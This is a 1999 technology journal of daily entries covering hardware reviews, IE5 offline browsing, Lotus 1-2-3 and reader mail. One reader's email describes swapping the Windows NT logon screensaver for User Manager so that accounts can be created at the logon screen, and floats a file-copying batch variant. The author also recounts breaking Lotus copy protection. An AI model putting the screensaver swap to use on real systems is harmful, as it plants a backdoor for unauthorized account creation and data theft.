Combining the BI440ZX ($100 street, with integrated Creative ES1373 audio) with a $125 PPGA Celeron/400 processor, a $90 stick of SDRAM, a $40 Intel 740 video card, a $125 hard drive, a $20 floppy drive, a $50 CD-ROM drive, a $30 keyboard, a $30 mouse, and a decent case and power supply gives you a $800 system that blows the doors off any of the similarly priced AMD- or Cyrix-based PCs sold at Best Buy and other mass marketers. Bumping up some of the components and spending a total of $1,000 or $1,100 gives you a system that compares favorably to systems sold by Dell and Gateway for 30% to 50% more.

The BI440ZX joins the Intel RC440BX and the EPoX BX-T (both Slot 1 boards that include integrated sound and video) as one of the select group of motherboards we would choose to build a low-cost, high-performance system for ourselves. This one's a keeper. We're going to make it a permanent part of our testbench as our Socket 370 test-bed system. Highly recommended.

Thursday

Thursday, April 8, 1999

One unexpected consequence of Barbara and me both working at home is that Daylight Saving Time didn't "take." Before the change, we'd usually awaken around 7:00 to 7:30, take out the dogs, and begin our morning routine. With the change, everything still works the same, but we instead get started around 8:00 to 8:30. So the result is that I'm now running an hour later than I used to. This morning, I got up, read and responded to the mail from overnight, did a quick read-through of the manuscript for Pournelle's April column, and then started to update this page. Here it is 10:45 a.m. already. I suppose that it doesn't matter much in the end. I'll put in the same number of hours every day. Every time the time changes I try to convince Barbara that we should run our house on Zulu time, but I've so far been unsuccessful.

* * * * *

One of the big news items from WinHEC is that Microsoft is flirting with the idea of Open Source. I don't think so. Microsoft's only interest in Open Source is how to make it go away or how to co-opt it, not in how to join the party. If you're expecting to see the source code for NT or Office any time soon, I'd suggest you not hold your breath. As they have done all along, Microsoft will release some source code, certainly. But it will be APIs and other code fragments intended to help third-party developers code to the proprietary Microsoft core products. And I don't blame them a bit. That's the same thing I'd do in their position.

* * * * *

AMD now admits that the K7 is not going to ship in June as previously announced. Their Q1 revenues were down significantly from the same period last year, they are facing shareholder lawsuits claiming that they did not disclose their true market position, the limited number of K6-III processors they are able to ship comes nowhere near meeting demand, and now their flagship K7 processor is going to be late. Things are not looking good for AMD.

* * * * *

I'm still mucking about with Internet Explorer off-line browsing. I can't figure out why I've never been able to synchronize a site successfully. The status column always reads "Succeeded" but the additional information column always reads "Updated: Some download errors". Why is that?

And I've never yet gotten scheduled updates to work properly. I can do an update manually, but when I try to schedule one, IE5 always reports "Scheduled updates disabled". I've looked everywhere I can think of within IE5 to make sure that scheduled updates are in fact enabled, but nothing seems to work. At one point, I'd about decided that the web sites I was synchronizing had somehow disabled scheduled updates from their end, but that doesn't seem to make sense.

Well, make me a liar. I was doing a manual synchronization as I was writing this. For the first time ever, a synchronize operation just completed without errors. IE5's off-line browsing would be a wonderful feature if it worked as intended and worked reliably. This is one of those Microsoft features that almost but not quite gets it right. I'll keep playing with it.

* * * * *

More interesting mail today, including one from a reader who still uses a once-dominant application that I used to use but had almost forgotten.

* * * * *

This from MITCHELL ARMISTEAD [mhaathome@worldnet.att.net]:

I teach software for a living, and thought you might be interested in this, courtesy of one of my students.

Rename winnt\system32\logon.scr to ...something else. make a copy of winnt\system32\usrmgr.exe named logon.scr Wait. In a few minutes, usermanager will appear, and allow you to create accounts.

Interesting?

Mitch Armistead
mhaathome@worldnet.att.net

Well, yes, except that this isn't really a security hole. The default security on \WINNT\system32\login.scr grants the Full Control permission only to Administrators and SYSTEM, Change to Server Operators, and Read to Everyone, so you'd have to have Administrator privileges to make the change in the first place.

And even if someone set this up and then restarted the machine, I don't think an unprivileged user who subsequently logged on would be able to do much with it. I haven't tried it, but I suspect the unprivileged user would simply be able to use User Manager normally. That is, to make changes to his own account but not to create or change other accounts.

* * * * *

And this followup from Mitch Armistead:

I did a little more checking on this tonight, and you're correct in that you'd have to be logged on with the correct permissions to set it up. But, once it is set up, User Manager for Domains starts automatically, and you can create accounts, and subsequently log on as those users. I thought it was interesting, because apparently, any program named login.scr will be run. What if it was a batch file that copied the contents of a folder somewhere else. And if auditing on that folder was on, who would the user be since no one is logged on?

Anyway, I'd never seen this little "trick", and thought you might find it interesting.

Well, if that's the case, it could indeed be a problem, although it would require either active collusion or incredible sloppiness on the part of someone with Administrator privileges. Even so, perhaps you should report the situation to Microsoft. As far as who the user would be, my guess is SYSTEM. Thanks for telling me about this.

* * * * *

This from Paul Robichaux [paul@robichaux.net]:

I've decided to build a BI440ZX-based system for a friend who needs a new machine to replace his old Tandy 1000 (no kidding). Where do you recommend buying pieces-n-parts? I know you have some local vendors you work with; do you buy everything there, or just buy based on street price, or what?

Cheers,

-Paul

--

Paul Robichaux | paul@robichaux.net | http://www.robichaux.net
Robichaux & Associates: programming, writing, teaching, consulting

I never go to the vendor with the lowest price. That way lies insanity. I tend to deal with the reputable "big-name" mail-order vendors like NECx, Insight, and PC Connection, who deliver what they say they will when they say they will, and don't ship you used components in new shrink-warp.

What I usually do is check out the rock-bottom prices on http://www.pricewatch.com or http://www.shopper.com and then use them to beat up the salespeople at NECx, etc. Within reason, that is. You can't compare an OEM Celeron from some fly-by-night outfit with the retail boxed Celeron that NECx or Insight is selling. Sometimes they'll match or even beat the price, sometimes they'll tell you they can't go any lower than the advertised price, and sometimes they'll cut their price some but not all the way to the bottom-feeder price. I almost always end up buying from one of the three I've mentioned. NECx is probably the best bet for broad product selection, although Insight comes close. PC Connection carries less DIY type stuff.

When you choose memory, go for one larger SDRAM stick rather than two smaller ones. The BI440ZX handles up to 256 MB, but it only has two DIMM slots.

* * * * *

This from M.F. or M.L. McDonell [mcdonell@nanosecond.com]:

Hello to you out there on the cutting edge.

Do you remember Lotus ? I have been using it since 1986 or thereabouts but its popularity has waned over the years. As you know, it is now a division of IBM.

At CompUSA Reno, I noted the "Millenium" version of Lotus and saw that I needed to part with $99 for a Y2K upgrade or start converting my 1-2-3 R5 files to MS Excel.

While preparing for this ordeal at home, I tried the company website and found a Y2K fix was being offered for free!

On the premise that you might want to forward this to your readers:

*NAVIGATION*

http://www.lotus.com/

click on 123 in the left frame

Select the green button named "News and Updates" (NOT the green button named "Support" it won't get you there)

Scroll downward to the last line that describes a Y2K Update for Lotus 1-2-3 and click on the link provided

Look for the instruction that contains the link labeled here and click on it.

A file named 123R5y2k.exe is available

Lotus/IBM recommends installing 123R5y2k.exe in the x:\123r5\programs directory (for Release 5.0, another path is suggested for Release 5.01)

Because I did not read the instructions; I downloaded the file to the desktop. In Explorer, dragged it to that directory (which created a shortcut, not a copy) and installed the file from within the recommended directory. The file is a temporary orphan on the desktop, as a result.

Regards.

McDonells
1303 KINGSLANE
GARDNERVILLE NV 89410-6006
1 (775) 783-1824
e-mail mcdonell@nanosecond.com

I hadn't thought about Lotus 1-2-3 in years. I haven't used it in a decade or so, and I think the last version I used was 2.01 for DOS. In the face of the Excel behemoth, I can't imagine many of my readers are still using Lotus, but I'll post this for any of those who might be.

Friday

Friday, April 9, 1999

I've still got more balls in the air than I can comfortably handle. This coming weekend will be devoted to finishing my taxes, which will reduce the pressure on me substantially. That means the updates here are likely to be short, although I'll try to get something up, along with any interesting mail that come in. Back to work now.

* * * * *

This from Chuck Waggoner [waggoner@gis.net]:

Several things I've discovered about this--and I've used the feature for a long time now.

I still use IE4, so there might be differences with IE5, but in mine, there is a check box called "Enable scheduled subscription updates" in the Internet Properties/Advanced tab, which I get to through Windows Explorer and right-click for Properties on the Internet Explorer in the left "All Folders" pane (down near the bottom of the list).

Here are some more things I've learned in IE4. When a new subscription is activated, on right-click item/Properties/Schedule tab, it defaults to "Don't update this subscription when I'm using my computer"--illogical, but it means it. Actually, you don't have to be sitting there using your computer: if it is doing something by itself--like indexing Find Fast,--then it thinks you are using the computer. So, every new subscription needs to have that box changed. Likewise, if you are connecting with a modem, that box needs to be checked when creating a new item, as the default is unchecked.

I get frequent errors, which include: not being able to open something that says it has been successfully updated (it tells you that item is not available offline and asks if you want to connect); items that say they have been updated, but after opening, are days old with no changes; and items that say 'no changes' but they ARE updated with changes.

My system goes in through a modem to the ISP, and IF a dialing attempt to update items fails on first try, 3 or 4 of the items in the update list are marked "error connecting to Internet"; if it fails on the second attempt, more items are marked as having failed, and so on, until all the items in the update list are gone before it has ever connected--then it quits trying. I think I've mentioned before that, with a modem, IE Subscriptions/Offline updates and Outlook email checks just can't occur at the same time.

Whichever finishes first, hangs up on the other. That may not be a problem with your proxy server, but it will be for anybody using modems. I have the IE updates occur only at the top of an hour, and start Outlook with Task Manager on the half hour, using an email check interval like 20, 40, or 60 minutes, which will never hit on-the-hour. But sometimes--like today--I want to send an email right away, and I forget to get those email checks back on schedule; sure enough, after I did that, Outlook hung up on an IE update this morning.

Another problem I experience is that the BBC News "Front Page" and "Business News" headline summary pages can only be viewed once offline; after that, I have to reconnect.

There is some knowledge by the site from which you are requesting information, that you are doing a Subscription/Offline update. I used to download 2 cartoons from The New York Times every weekday, and one day a few months ago, I got a message reading something like: You cannot automatically download bookmarked pages--you must visit this page online. Strange that the cartoon pages seem to be the ONLY ones I can't load, however, and I used to be able to download those.

I do wish Microsoft would give us more control over what the various Property and setup boxes default to, but even with all these--what seems to me--correctable-by-Microsoft problems, it is a real boon to be able to get to what I'm interested in seeing each day instantly, without having to go online and waiting.

--Chuck Waggoner [waggoner@gis.net]

I never used the subscription feature in IE4 much, but I believe that the off-line browsing feature in IE5 is pretty much the same except for the name change. I've not had most of the problems you describe, so perhaps they've at least eliminated many of the bugs. As far as the dial-up session dropping carrier, have you checked your settings in Outlook? There's an option somewhere in there that allows you to specify whether or not Outlook hangs up after it finishes checking mail. I assume the same is true (somewhere, someplace) for IE. I use the WinGate proxy server, so my machines are not directly dialed in. Instead, I configure applications to expect Internet access through a network connection, which works fine.

I'm really curious about how web sites discriminate between a browser doing a page request interactively versus in scheduled update mode. I mean, I can understand that in scheduled update mode IE might read and honor robots.txt, but how would it differentiate between synchronizing on demand or in scheduled mode? Perhaps it ignores robots.txt in on-demand synchronizing.

And I agree that Microsoft should give us many more options for setting default behavior. If you spend much time cruising the registry, you'll find that many default behaviors are in fact configurable if you care to make manual registry changes. There's just nowhere to change behavior from within a pretty dialog. Sometimes I wonder if these were things that users didn't need to be changing, or if they were just too lazy to make an option available to change the setting from within a program.

* * * * *

Some time ago, I reviewed the book Gates of Fire by Steven Pressfield, which I liked quite a lot. I received the following message yesterday evening from someone who really liked the book:

From: Sparta480@aol.com
Subject: Gates of Fire, by Steven Pressfield/Commentary by Steffen White

This is more than a book. It is a vivid re-creation of a long-extinct culture whose warrior-ethos now strikes most people as utterly alien. Yet there was a time--2,478 years ago--when that culture and the men who lived by its laws were all that stood between freedom and enslavement for Greece.

Steven Pressfield has done the impossible--he has allowed us to see ancient Sparta not only through its own eyes but to make it intelligible to our own.

For example, there is the field-training scene where Spartan soldiers yell: "This is my shield. I bear it before me into battle, but it is not mine alone...." Anyone who has seen Stanley Kubrick's "Full Metal Jacket" will instantly recall the words shouted on Marine training-grounds: "This is my rifle. There are many others like it, but this one is mine..." Thus, Pressfield makes it possible for us to see that elite warrior units share many of the same characteristics--leadership, discipline and superior training techniques.

Yet even more fascinating and moving than the gripping battle-scenes are those of dialogue between leading characters. The insights offered by Dienekes, greatest of Spartan warriors, on the meaning of courage ("The oposite of fear is love") are truly unforgettable. As are the exchanges between his wife, Arete, and his squire, Xeo Arete's musings on fate ("The gods will us to love whom we will not, and disrequite those we will") are as profound and moving as Herodotus' putting into the mouth of Solon: "Look to the end, then, whatever you are considering. Often enough, the gods give a man a gleam of happiness, and then utterly ruin him."

This is a book meant to last--to be cherished and re-read by anyone who loves ancient history--and anyone who seeks truths about human nature and to what heights men and women can rise when they place their courage in service to a worthy cause.

Not to trivialize, but now I have the modern version of the chant running through my head, "This is my rifle. This is my gun. This one's for fighting. This one's for fun."

Saturday

Saturday, April 10, 1999

FedEx showed up yesterday with a box from OnStream that contained a DI30 tape drive and several tapes. What I want to do this weekend is install the tape drive and work with it. What I'm going to do instead is my taxes. Ugh. Don't expect much here tomorrow.

* * * * *

As my regular readers will remember, I despise television commercials. So I found an article in the business section of yesterday's newspaper quite cheering. Most people would assume that local television stations pay the network for the right to run network shows. In fact, the situation is exactly the reverse. The network pays the local affiliates to run network programming. The network sells commercials to national advertisers and uses part of that revenue to pay the local stations to run the shows. That way, many people see the commercials the network sold.

But the network doesn't sell all of the available commercial slots. They leave some empty, which can then be sold directly by the local station to local and other advertisers. The Fox network apparently is unilaterally reducing the number of these vacant commercial slots available to the local stations from about 70 per week to 50 per week. By selling those additional 20 slots directly, the network will increase its revenue by an amount variously estimated at $100 million to $200 million annually. Obviously, the local affiliates are upset about this, but there's not much they can do about it.

Upsetting its affiliates is not a wise thing for a network to do, but apparently Fox has little choice. Their revenues are dropping for two reasons, and they have to do something about it. Reason One is that TV shows are costing more and more to produce. The $13 million per episode cost of ER is an extreme example, but the cost of producing any show has been increasing faster than inflation for a long time now. Reason Two is that network viewership is dropping substantially every year, which in turn means that advertisers are paying less for commercials that are seen by fewer people.

Even worse, the demographics of network viewership are changing for the worse as far as advertisers are concerned. Advertisers want the people who see their commercials to be good prospects--likely and able to buy the advertised product. What that really means is that they want suburban, middle-class viewers in the 25-49 age group. By and large, older people are already set in their ways and less likely to be influenced by commercials. Younger ones are less likely to have the economic wherewithal or the decision making role. But network demographics are going into the toilet. Middle-class, 25 to 49 viewers are abandoning network television in droves for cable and videos. Network viewership is increasingly young, poor, and urban, none of which are markets targeted by most advertisers.

And all of this contributes to a downward spiral. Shows designed to appeal to the middle-class, suburban 25 to 49 people are getting less viewership and so are increasingly being replaced by shows intended to appeal to what viewers the networks have left. This in turn makes the desired viewers even less likely to tune in, and makes it more likely that shows for the 25-49's will be replaced by shows intended to appeal to the poor, urban, under-25 viewers. Ultimately, this probably means that network television cannot survive with a model based on advertising revenue, or so I hope. Loud cheers. I hope that "free" commercial television disappears completely, to be replaced by 100% pay-per-view television.

* * * * *

This from John Tucker [jtucker@attcanada.com]:

Been reading your site for a while now, and enjoying it. When I received the following I thought that it might be something you'd appreciate. I have no idea as to the veracity of the information yet it seems to be plausible. At the very least its good for a laugh.

True Capitalism

During the heat of the space race in the 1960s, the U.S. National Aeronautics and Space Administration realised that astronauts would have to be able to record certain things while performing their duties and so it needed a writing utensil capable of writing in the zero gravity confines of its space capsules. Of Course, a normal pen will not work since they are all gravity fed. After considerable research and development spanning over two years, the working zero-g Astronaut Pen was developed at a cost of approximately $US1 Million (in 1960's dollars !!). The initial production run was fifty pens. The Soviet Union was faced with the same problem...but they issued pencils.

No reply necessary.

I believe it, although it's incredible to me that it could require $1,000,000 worth of R&D to pressurize the ink cartridge slightly. Perhaps there's more to it than that. I also recall discussion during the Gemini program in the early- to mid-60's. They were at that time preparing for the first extra-vehicular activity (EVA). Obviously, they didn't want the astronaut to drift away from his craft, so they needed some means of making sure he stayed connected. What they came up with, at significant cost, was an innovative hi-tech device called a "flexible tether." To normal people, of course, it was indistinguishable from a rope.

* * * * *

And this response from Jerry Pournelle [jerryp@jerrypournelle.com]:

Actually that tether was not quite as simple to design as you think, and the real cost was in testing it and being able to disconnect, and where it would attach, and what if the astronaut died or became unconscious, and other stuff. I worked on that program.

And we considered pencils and shavings and sharpening and shuddered. True, there were more people charging off on that program than should have, but in part it's because a lot of human factors people needed a budget number and the food program was over budget.

I figured it was something like that. Heck, I was only 12 years old at the time. I'm surprised I even remember those details. I wonder if anyone considered using a mechanical pencil.

* * * * *

This followup from Jerry Pournelle [jerryp@jerrypournelle.com]:

Yeah, we didn't like the notion of graphite, and there was the business of eraser dust. Not giving them an eraser would help. But it was decided to bite the bullet and design something once and for all.

There's a lot of waste, but it's mostly that you have people you can't fire so they may as well work on one thing as another. Then you charge them to that project.

Okay. That makes sense. Actually, I know enough about cost accounting to appreciate what you're saying. I've often made the point to people railing on about $600 toilet seats that the situation is analogous to someone who contracts to have a house built and then, when the house is almost complete, insists that one concrete block in the foundation be removed and replaced with a different one. The contractor tears down the house, replaces the concrete block, and rebuilds the house to where it was. The newspapers report that that contractor charged $100,000 for a concrete block. Sometimes you can't win.

* * * * *

This from Bo Leuf [bleuf@leuf.net]:

In daynotes...

"Whichever finishes first, hangs up on the other. That may not be a problem with your proxy server, but it will be for anybody using modems."

Oh yes, I have noticed this. If an IE5 window is open, and I'm using something else on the dial-up (ftp, Opera, OL), after the present time (20 minutes) this dialog pops up saying that the connection hasn't been active recently (never mind any other activity on the line), asking shall it be closed, with an automatic countdown to actually close the connection -- such rudeness! The first time I got very confused, because I was doing a lengthy ftp download, and had I not been there, this download would have been cut off in mid- transfer. The dialog was anonymous, so it took a while to realize that it was IE triggering it. Interestingly, it doesn't matter whether IE starts the dial-up session or not, it just blithely assumes somehow that it is the only application using the connection and is therefore fully competent to decide that it can be terminated just because nobody is browsing in IE.

/ Bo

--

"Bo Leuf" bo@leuf.net
Leuf Network, www.leuf.net

I used to have a full-time Internet connection, so I never noticed that. For a very short time, I used direct dial-up from my main workstation. Then I installed WinGate, which now provides a shared Internet connection to all the machines on my network. While I was using the direct dial-up, I lied to Outlook and told it that it had a network connection. I then made the connection manually before checking mail. I don't think I ever experienced the problem you describe, so that wasn't why I told Outlook it had a network connection.. I just didn't want Outlook or IE doing my dialing for me.

Now, I have WinGate setup to time out after 30 minutes of inactivity. I have Outlook set to check mail every five or ten minutes, so my connection stays up all day long. Even if I close Outlook, chances are that Barbara will have her Outlook open, or that one of us will be on the web or doing something else that keeps traffic flowing. BellSouth.net says unlimited use, and I take them at their word. They do drop a connection after 12 hours no matter what's going on at the moment, so I'm pretty careful about that. They once dropped a connection that reached 12:00 duration when I was 26 MB into a 27 MB download.

* * * * *

This from M.F. or M.L. McDonell [mcdonell@nanosecond.com]:

Where I used to work, I introduced Lotus 2.01 to the staff in 1989. It was a government job, so they had no $ for silly new stuff. I lent the office my IBM-XT (really); on which my only copy of Lotus was installed. Remember the installation counter switch? Do you remember the flashing "Wait" light as simple calculations were generated?

When we purchased that XT, it cost a small fortune. The company I worked for at that time required my work to be done on a PC but refused to buy me one. Thus, I had to wait until after hours and use someone else's machine. A different seller (now long defunct) tried to tell us that IBM would not honor their warranty if we used anything but IBM software. Scared us to death until he realized we were not a corporation and refused to sell us anything! Imagine that!

Meanwhile, the office staff took to the PC and they generated a whopping amount of files in Lotus. As you know, Excel prevailed and it can open and convert Lotus files. Unfortunately, many of the functions are not the same and the operator must contend with a time-consuming rewriting of the equations; which come through like this ############. A big help, those folks at Microsoft. Well, I found out last year that those bureaucrats were trying to justify a new PC, just to perform those conversions!! I yelled like hell and ordered a Lotus 97 disk. They were astounded to find out that IBM was supporting, even upgrading, 1-2-3. They got the PC anyway.

The reason for the archive was that the 1990 era templates I designed for them would not wear out. Also, they could not bear to erase files once a hard copy was produced. Then, they produced variants (my masters were locked). Errors crept in. It was nightmarish.

In 1997, I recovered the XT and they complained. I gave the IBM to the county library; which had the good sense to throw it away. I kept that copy of Lotus 123 Ver 2.01 as a memento of the dark ages. I now use Version 5.

I remember the installation counter. At that time, I was working for the Forsyth County MIS Department, and we were just starting to deploy PCs in large numbers. Well, large for us at the time. We were getting PCs in ten and twenty at a time. We didn't have the staff to co-ordinate copy-protected software, so we used the PC Tools copy protection breaker (Copy2PC?) to fix the Lotus 2.01 executable. That way, we could create a master configuration on the hard disk of one machine, back it up (to floppies) and then restore that master set to each new PC. We still purchased a legal copy of Lotus for each machine, but we just stuck the disks in their sealed envelopes on the shelf so that we could prove we were legal if it ever came to that.

Before that, I worked for an Entre Computer Center. We'd had so many problems with Lotus copy protection that we routinely broke the copy protection before we installed the product for customers. We didn't tell them we'd broken the copy protection, but we did it just the same. We'd had so many needless service calls that were caused by Lotus copy protection that we did it in self defense. Something as simple as restoring a backed up copy of the program would wipe out the counter and render the product unusable. I'm glad the days of copy protection ended, but it appears that copy protection may be returning, and the Intel CPU serial number may be the hook that allows it to.

Sunday

Sunday, April 11, 1999

I spent all day yesterday working on taxes, and I'm not finished yet. The good news, I suppose, is that for the first time in years I'll be getting a refund instead of having to write a multi-thousand dollar check to the feds. On the other hand, that means they've had my money interest-free all year.

The first pass on the federal taxes is done. Today, I'll do the second pass, checking carefully for missed deductions, etc. and then do the state. I really want to move to a state that has no income tax. The federal income tax is unavoidable, but there are any number of states that don't have one. Back to it. I'm in my usual bad mood for mid-April.

* * * * *

This from Scott Kitterman [kitterma@erols.com]:

I just finished reading Black Hawk Down. Although a different story of a different era, it reminds me of Gates of Fire in the way it transports you into the action. Highly recommended. Here is a review:

Scott Kitterman
kitterma@erols.com

I looked at the review and the book does sound interesting. I doubt I'll get time to read it, however. Thanks for letting me know.

* * * * *

This from Bo Leuf [bo@leuf.com]:

"I'm glad the days of copy protection ended, but it appears that copy protection may be returning, and the Intel CPU serial number may be the hook that allows it to."

Not a pleasant prospect. So what do you suppose will then happen to the people who for various reasons get their CPU (or system) replaced? I shudder at the here implied scenario where you have your system serviced/upgraded in some way and this immediately breaks all installed software, perhaps even the OS, with say an aggressive error message saying at bootup that the installation is an illegal copy. Or perhaps more subversively would still allow normal bootup and use, but then invisibly go out on the Net at first opportunity and reports its "illegal" status directly to whomever. I am also reminded of some shareware products that showed buggy registration routines, where for example a netmessage editor would user-unknowingly, and sometimes incorrectly, append the tagline "this is an unregistered and illegal copy of XXX" or the equivalent.

/ Bo

--

"Bo Leuf" bo@leuf.com
Leuf fc3 Consultancy
http://www.leuf.com/

Exactly. The Pentium II/III serial number in conjunction with the increasing trend toward forced registrations, which I've railed about in the past, means that changing your CPU (or upgrading to a new system) will mean that you have to contact software vendors for a new init key. If this becomes ubiquitous, it's possible that many people who have many software products installed may have to spend literally days on the phone just getting those new init keys, if indeed the software manufacturer's are willing to provide them. We may find that software is now being licensed to a particular CPU.

And if you think that's ridiculous, note Microsoft's slipstreamed license change. It used to be that they licensed software for one PC. That meant, for example, that if I bought a system with a bundled Windows 95 license and decided to use that machine to run Linux, I could then use that Windows 95 license on another machine. Microsoft's new license changes that. It now licenses software to a particular computer. If I buy a new machine with a Windows 98 license, I can use that license only on that particular machine. If other software manufacturers begin licensing their software this way, we may find that replacing the CPU or upgrading to a new machine will require us to buy new licenses for all our software.

That's the real reason I'm following Linux with so much interest. Right now, Linux is a usable server OS, but isn't ready for prime time as a client OS. But as applications (and particularly graphics shells) for Linux become more refined over the next year or two, I may make the shift entirely to Linux. Ultimately, I think Microsoft's goal is to rent software to us. I don't want to pay Microsoft an annual rental fee for each application.